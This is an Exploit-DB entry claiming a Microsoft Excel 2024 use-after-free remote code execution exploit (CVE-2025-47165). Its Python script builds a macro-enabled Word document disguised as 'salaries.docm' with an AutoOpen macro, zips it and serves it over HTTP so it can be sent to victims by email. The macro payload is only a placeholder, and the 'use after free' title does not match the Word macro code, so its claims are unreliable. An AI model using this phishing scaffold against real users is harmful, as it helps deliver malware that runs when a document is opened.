Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)

EDB-ID:

52343

CVE:

2025-47165

EDB Verified:

Author:

nu11secur1ty

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2025-06-26

Vulnerable App: 
# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
Microsoft 365 Apps for Enterprise

# Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCM file via email or a streaming server. After the
execution of the victim, his machine can be infected or even worse than
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!

#!/usr/bin/python

import os
import sys
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile

PORT = 8000
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
DIRECTORY = "."

def create_docm_with_macro(filename=DOCM_FILENAME):
    pythoncom.CoInitialize()
    word = Dispatch("Word.Application")
    word.Visible = False

    try:
        doc = word.Documents.Add()
        vb_project = doc.VBProject
        vb_component = vb_project.VBComponents("ThisDocument")

        macro_code = '''
Sub AutoOpen()
      //YOUR EXPLOIT HERE
      // All OF YPU PLEASE WATCH THE DEMO VIDEO
      // Best Regards to packetstorm.news and OFFSEC
End Sub
'''

        vb_component.CodeModule.AddFromString(macro_code)

        doc.SaveAs(os.path.abspath(filename), FileFormat=13)
        print(f"[+] Macro-enabled Word document created: {filename}")

    except Exception as e:
        print(f"[!] Error creating document: {e}")
    finally:
        doc.Close(False)
        word.Quit()
        pythoncom.CoUninitialize()

def zip_docm(docm_path, zip_path):
    with zipfile.ZipFile(zip_path, 'w', compression=zipfile.ZIP_DEFLATED)
as zipf:
        zipf.write(docm_path, arcname=os.path.basename(docm_path))
    print(f"[+] Created ZIP archive: {zip_path}")

def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip

class Handler(http.server.SimpleHTTPRequestHandler):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=DIRECTORY, **kwargs)

def run_server():
    ip = get_local_ip()
    print(f"[+] Starting HTTP server on http://{ip}:{PORT}")
    print(f"[+] Place your macro docm and zip files in this directory to
serve them.")
    print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()

if __name__ == "__main__":
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word
installed.")
        sys.exit(1)

    print("[*] Creating the macro-enabled document...")
    create_docm_with_macro(DOCM_FILENAME)

    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)

    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()

    try:
        while True:
            pass  # Keep main thread alive
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")


```

# Reproduce:
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/COiBVA)

# Time spent:
01:37:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>




-- 

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services